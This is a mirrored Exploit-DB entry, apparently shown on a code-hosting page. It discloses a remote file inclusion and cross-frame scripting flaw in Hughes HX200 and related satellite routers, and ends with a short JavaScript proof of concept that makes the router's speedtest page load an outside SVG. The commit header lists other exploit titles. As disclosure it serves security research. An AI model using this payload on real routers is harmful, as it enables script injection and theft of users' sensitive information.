bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/remote/51190.txt
Exploit-DB 3de26153c8 DB: 2023-04-02 
23 changes to exploits/shellcodes/ghdb

ELSI Smart Floor V3.3.3 - Stored Cross-Site Scripting (XSS)

Hughes Satellite Router HX200 v8.3.1.14 -  Remote File Inclusion

Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)

TP-Link TL-WR902AC firmware 210730 (V3) - Remote Code Execution (RCE) (Authenticated)

GeoVision Camera GV-ADR2701 - Authentication Bypass

AD Manager Plus 7122 - Remote Code Execution (RCE)

Enlightenment v0.25.3 - Privilege escalation

Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)

Apache 2.4.x - Buffer Overflow

perfSONAR v4.4.5 - Partial Blind CSRF

SugarCRM 12.2.0 - Remote Code Execution (RCE)

XCMS v1.83 - Remote Command Execution (RCE)

Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected Cross Site Scripting (XSS)

GitLab v15.3 - Remote Code Execution (RCE) (Authenticated)

AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS)

NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit

Splashtop 8.71.12001.0 - Unquoted Service Path

Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS)

FlipRotation v1.0 decoder - Shellcode (146 bytes)

Linux/x86 - Polymorphic linux x86 Shellcode (92 Bytes)

macOS/x64 - Execve Caesar Cipher String Null-Free Shellcode
2023-04-02 00:16:21 +00:00

71 lines
No EOL
2.4 KiB
Text
Raw Blame History

Exploit Title: Hughes Satellite Router HX200 v8.3.1.14 - Remote File Inclusion
Vendor: Hughes Network Systems, LLC
Product web page: https://www.hughes.com
Affected version: HX200 v8.3.1.14
HX90 v6.11.0.5
HX50L v6.10.0.18
HN9460 v8.2.0.48
HN7000S v6.9.0.37
Summary: The HX200 is a high-performance satellite router designed to
provide carrier-grade IP services using dynamically assigned high-bandwidth
satellite IP connectivity. The HX200 satellite router provides flexible
Quality of Service (QoS) features that can be tailored to the network
applications at each individual remote router, such as Adaptive Constant
Bit Rate (CBR) bandwidth assignment to deliver high-quality, low jitter
bandwidth for real-time traffic such as Voice over IP (VoIP) or videoconferencing.
With integrated IP features including RIPv1, RIPv2, BGP, DHCP, NAT/PAT,
and DNS Server/Relay functionality, together with a high-performance
satellite modem, the HX200 is a full-featured IP Router with an integrated
high-performance satellite router. The HX200 enables high- performance
IP connectivity for a variety of applications including cellular backhaul,
MPLS extension services, virtual leased line, mobile services and other
high-bandwidth solutions.
Desc: The router contains a cross-frame scripting via remote file inclusion
vulnerability that may potentially be exploited by malicious users to compromise
an affected system. This vulnerability may allow an unauthenticated malicious
user to misuse frames, include JS/HTML code and steal sensitive information
from legitimate users of the application.
Tested on: WindWeb/1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5743
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5743.php
23.12.2022
--
snippet:///XFSRFI
//
// Hughes Satellite Router RFI/XFS PoC Exploit
// by lqwrm 2022
//
//URL http://TARGET/fs/dynaform/speedtest.html
//Reload target
//window.location.reload()
console.log("Loading Broadband Satellite Browsing Test");
//Add cross-frame file include (http only)
AddURLtoList("http://www.zeroscience.mk/pentest/XSS.svg");
console.log("Calling StartTest()");
StartTest()
//console.log("Calling DoTest()");
//DoTest()
//Unload weapon
//document.getElementById("URLList").remove();
Reference in a new issue View git blame Copy permalink